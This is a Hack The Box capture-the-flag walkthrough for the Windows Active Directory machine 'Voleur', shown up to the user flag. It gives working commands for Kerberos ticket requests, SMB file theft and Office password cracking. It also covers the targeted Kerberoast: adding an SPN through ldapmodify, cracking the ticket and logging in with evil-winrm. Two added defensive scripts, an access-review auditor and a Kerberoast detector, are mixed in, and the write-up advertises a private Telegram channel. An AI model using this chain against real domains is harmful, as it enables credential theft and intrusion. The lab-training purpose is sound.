
Voleur - Hack The Box

Platform: Windows

IP: 10.129.29.242

Difficulty: Medium

Author: NoSec

🚨 Follow live on HTB – leaks, drops, and deep writeups
👉 t.me/nosecpwn
Don't just read. Join us.


Recon

nmap -sV -sC -Pn 10.129.29.242
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 10:16 CEST
Nmap scan report for 10.129.29.242
Host is up (0.063s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 16:16:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2222/tcp open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

The box ships with starting credentials:

ryan.naylor / HollowOct31Nyt

Edit the hosts file:

sudo nano /etc/hosts
10.129.29.242       voleur.htb dc.voleur.htb

Time synchronisation matters: Kerberos rejects requests when the clock skew exceeds five minutes, so sync against the DC before requesting any tickets:

sudo rdate -n dc.voleur.htb

Kerberos

Set krb5.conf:

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false

[realms]
    VOLEUR.HTB = {
        kdc = 10.129.29.242
        admin_server = 10.129.29.242
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

Obtain Kerberos ticket (TGT):

kinit ryan.naylor@VOLEUR.HTB

Kerberos SMB connection with Impacket. kinit has already placed the TGT in the default credential cache, which -k reads; only if the ticket was obtained with impacket-getTGT instead does KRB5CCNAME need to point at the resulting .ccache file:

smbclient.py -k -no-pass -dc-ip 10.129.29.242 VOLEUR.HTB/ryan.naylor@dc.voleur.htb

Download the file Access_Review.xlsx from the share:

get Access_Review.xlsx

Crack the file (office2john + john):

office2john Access_Review.xlsx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked password:

fo<pass>

Decrypt the workbook with the cracked password and convert it to CSV:

pip install msoffcrypto-tool
msoffcrypto-tool Access_Review.xlsx decrypted.xlsx -p fo<pass>
xlsx2csv decrypted.xlsx access.csv
cat access.csv

File Contents

User,Job Title,Permissions,Notes
Ryan.Naylor,First-Line Support Technician,SMB,Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant,First-Line Support Technician,SMB,
Lacey.Miller,Second-Line Support Technician,Remote Management Users,
Todd.Wolfe,Second-Line Support Technician,Remote Management Users,Leaver. Password was reset and account deleted.
Jeremy.Combs,Third-Line Support Technician,Remote Management Users.,Has access to Software folder.
Administrator,Administrator,Domain Admin,Not to be used for daily tasks!


Service Accounts,,,
svc_backup, ,Windows Backup,Speak to Jeremy!
svc_ldap,,LDAP Services,P/W - [REDACTED]
svc_iis,,IIS Administration,P/W - [REDACTED]
svc_winrm,,Remote Management ,Need to ask Lacey as she reset this recently.
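As an added defensive example (not part of the original writeup): a small audit script that parses an access-review export in the layout shown above and flags the entries that gave this attack chain its footholds, namely a password written into the spreadsheet, an account with Kerberos pre-authentication disabled, and a leaver still listed. The embedded CSV is a constructed copy of the sheet above with the passwords replaced by placeholders, and the rule names are this example's own.

```python
import csv
import io
import re

# Constructed sample: a copy of the decrypted Access_Review.xlsx export shown
# above, with the plaintext passwords replaced by <REDACTED> placeholders.
ACCESS_REVIEW_CSV = """\
User,Job Title,Permissions,Notes
Ryan.Naylor,First-Line Support Technician,SMB,Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant,First-Line Support Technician,SMB,
Lacey.Miller,Second-Line Support Technician,Remote Management Users,
Todd.Wolfe,Second-Line Support Technician,Remote Management Users,Leaver. Password was reset and account deleted.
Jeremy.Combs,Third-Line Support Technician,Remote Management Users.,Has access to Software folder.
Administrator,Administrator,Domain Admin,Not to be used for daily tasks!


Service Accounts,,,
svc_backup, ,Windows Backup,Speak to Jeremy!
svc_ldap,,LDAP Services,P/W - <REDACTED>
svc_iis,,IIS Administration,P/W - <REDACTED>
svc_winrm,,Remote Management ,Need to ask Lacey as she reset this recently.
"""

# Rule ids and severities are this example's own, not from any standard.
RULES = [
    # (rule id, severity, regex applied to the Notes column, why it matters)
    ("CREDENTIAL_IN_DOCUMENT", "high",
     re.compile(r"\b(p/?w|pass(word)?|pwd)\b\s*[-:=]", re.IGNORECASE),
     "a password is written into a shared spreadsheet"),
    ("PREAUTH_DISABLED", "high",
     re.compile(r"pre-?auth\w*\s+disabled", re.IGNORECASE),
     "account is exposed to AS-REP roasting (crackable material without a password)"),
    ("LEAVER_STILL_LISTED", "medium",
     re.compile(r"\b(leaver|deleted)\b", re.IGNORECASE),
     "departed user still appears in the review; verify the object is really gone"),
]


def audit_access_review(text):
    """Return a list of findings, one per (user, rule) hit, in sheet order."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        user = (row.get("User") or "").strip()
        perms = (row.get("Permissions") or "").strip()
        notes = (row.get("Notes") or "").strip()
        # Skip blank separator rows and the "Service Accounts" section header,
        # which carries a name but no permissions and no notes.
        if not user or (perms == "" and notes == ""):
            continue
        for rule_id, severity, pattern, reason in RULES:
            if pattern.search(notes):
                findings.append({"user": user, "rule": rule_id,
                                 "severity": severity, "reason": reason})
    return findings


def summarize(findings):
    """Group the rule ids that fired by user, for a quick report."""
    by_user = {}
    for f in findings:
        by_user.setdefault(f["user"], []).append(f["rule"])
    return by_user


if __name__ == "__main__":
    for f in audit_access_review(ACCESS_REVIEW_CSV):
        print(f"[{f['severity'].upper():6}] {f['user']:15} {f['rule']}: {f['reason']}")
```

Run against the sheet above it reports four findings: Ryan.Naylor (pre-auth disabled), Todd.Wolfe (leaver), and svc_ldap and svc_iis (passwords in the document). The regexes deliberately require a separator after the password keyword, so Todd.Wolfe's "Password was reset" note is not misreported as a stored credential.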

The svc_ldap credentials from the spreadsheet turn out to have write access to svc_winrm's servicePrincipalName attribute, so add an SPN to the account to make it Kerberoastable:

cat > addspn.ldif << 'EOF'
dn: CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb
changetype: modify
add: servicePrincipalName
servicePrincipalName: HTTP/voleur.htb
EOF

ldapmodify -x   -H ldap://10.129.29.242   -D "svc_ldap@voleur.htb"   -w "M1<pass>"   -f addspn.ldif

Request the service ticket and crack the hash. -k reads the ticket from KRB5CCNAME, so obtain a TGT for svc_ldap first, as was done for ryan.naylor with kinit above:

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -k -request -request-user svc_winrm -dc-ip 10.129.29.242 -dc-host dc.voleur.htb voleur.htb/svc_ldap > tgs_hashes.txt

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs tgs_hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFire<pass> (?)     
1g 0:00:00:05 DONE (2025-07-06 21:12) 0.1886g/s 2164Kp/s 2164Kc/s 2164KC/s AHANACK6978012..ADDRESS1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Cracked password:

AFire<pass>
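The detection side of the two steps above, as an added example that is not part of the original writeup: the SPN write shows up in the Security log as event 5136 (directory service object modified, attribute servicePrincipalName) and the roast itself as event 4769 (service ticket requested) with an RC4 encryption type (0x17, the "etype 23" john reports). The events below are constructed, using the real Windows field names for those event IDs; the 10.10.14.5 client address and the rule names are this example's own.

```python
from datetime import datetime, timedelta

# Constructed sample Security events (not telemetry from the box). Field names
# follow the Windows schema for event 5136 (directory service object modified)
# and event 4769 (Kerberos service ticket requested). 10.10.14.5 is a made-up
# client address.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TimeCreated": "2025-07-06T21:00:05",
     "TargetUserName": "ryan.naylor@VOLEUR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 5136, "TimeCreated": "2025-07-06T21:05:10",
     "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb",
     "ObjectClass": "user", "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "HTTP/voleur.htb", "OperationType": "%%14674"},
    {"EventID": 4769, "TimeCreated": "2025-07-06T21:06:42",
     "TargetUserName": "svc_ldap@VOLEUR.HTB", "ServiceName": "svc_winrm",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 4769, "TimeCreated": "2025-07-06T21:30:00",
     "TargetUserName": "lacey.miller@VOLEUR.HTB", "ServiceName": "svc_iis",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.129.29.50"},
]

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP: crackable offline
VALUE_ADDED = "%%14674"         # 5136 OperationType code for "Value Added"


def cn_from_dn(dn):
    """'CN=svc_winrm,OU=...' -> 'svc_winrm' (lower-cased for matching)."""
    rdn = dn.split(",")[0]
    return rdn[3:].lower() if rdn.upper().startswith("CN=") else rdn.lower()


def detect_kerberoast(events, window=timedelta(hours=1)):
    """Correlate SPN additions (5136) with RC4 TGS requests (4769).

    Returns alerts in time order. A lone RC4 ticket request for a user
    account is low severity (it may be a legacy client); one that follows an
    SPN being added to that same account within `window` is rated high,
    because that is exactly the targeted Kerberoast sequence.
    """
    alerts = []
    spn_adds = []   # (timestamp, account cn, actor, spn value)
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if (ev["EventID"] == 5136
                and ev.get("AttributeLDAPDisplayName") == "servicePrincipalName"
                and ev.get("OperationType") == VALUE_ADDED):
            account = cn_from_dn(ev["ObjectDN"])
            spn_adds.append((ts, account, ev["SubjectUserName"], ev["AttributeValue"]))
            alerts.append({"rule": "SPN_ADDED", "severity": "medium",
                           "time": ev["TimeCreated"], "service": account,
                           "spn": ev["AttributeValue"],
                           "spn_added_by": ev["SubjectUserName"]})
        elif ev["EventID"] == 4769 and ev.get("TicketEncryptionType") in RC4_ETYPES:
            service = ev["ServiceName"].lower()
            if service.endswith("$") or service == "krbtgt":
                continue   # machine accounts and the KDC are not roast targets
            recent = [a for a in spn_adds
                      if a[1] == service and timedelta(0) <= ts - a[0] <= window]
            alert = {"rule": "RC4_TGS_REQUEST", "severity": "low",
                     "time": ev["TimeCreated"], "service": service,
                     "requester": ev["TargetUserName"], "client": ev.get("IpAddress")}
            if recent:
                alert.update(rule="TARGETED_KERBEROAST", severity="high",
                             spn_added_by=recent[-1][2], spn=recent[-1][3])
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(SAMPLE_EVENTS):
        print(f"{a['time']} [{a['severity'].upper()}] {a['rule']}: {a}")
```

Two things a practitioner should know before relying on this: event 5136 is only logged when the "Audit Directory Service Changes" subcategory is enabled and the user objects carry a SACL for attribute writes, and the RC4 filter only works while AES-only ticket policy is not yet enforced; once it is, the roast stops yielding crackable material and the SPN write remains the signal to watch.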

Request a TGT for svc_winrm with the cracked password and point KRB5CCNAME at the saved cache:

impacket-getTGT 'VOLEUR.HTB/SVC_WINRM:AFire<pass>'
export KRB5CCNAME=SVC_WINRM.ccache

Log in via evil-winrm and grab the user flag:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
*Evil-WinRM* PS C:\Users\svc_winrm> cd Desktop
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> ls


    Directory: C:\Users\svc_winrm\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/6/2025  10:33 AM             34 user.txt

User flag acquired!


🔐 The root section is available only in our private Telegram group as long as the machine is active in Season 8.
👉 Join us for the full writeup, extra tips, and insider content:
📡 https://t.me/nosecpwn